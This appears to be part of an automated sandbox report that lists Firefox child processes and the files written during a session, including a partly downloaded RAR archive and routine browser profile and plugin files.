"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.4.1084011871\465001702" -childID 3 -isForBrowser -prefsHandle 5312 -prefMapHandle 5244 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {852893ed-e72b-49fe-a9ff-09f88bdb9c9c} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 5292 1a2a63e5758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.5.388493459\796138205" -childID 4 -isForBrowser -prefsHandle 5664 -prefMapHandle 5612 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b347050-6488-4fa6-8329-0f086cf2b883} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 5648 1a2a65f2a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.6.1333653784\580149765" -childID 5 -isForBrowser -prefsHandle 5828 -prefMapHandle 5832 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcd95f32-c73b-4356-9058-6c9a7abc2054} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 5816 1a2a65f1e58 tab
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
C:\Users\Admin\Downloads\dBhAKJfb.rar.part
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\activity-stream.discovery_stream.json.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Temp\tmpaddon
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs-1.js
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\cache2\entries\C72D4296C2EBC6FD41A9F780CD0C8F30F0FF937C
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\sessionstore.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\sessionCheckpoints.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dsfbkuj2.default-release\prefs-1.js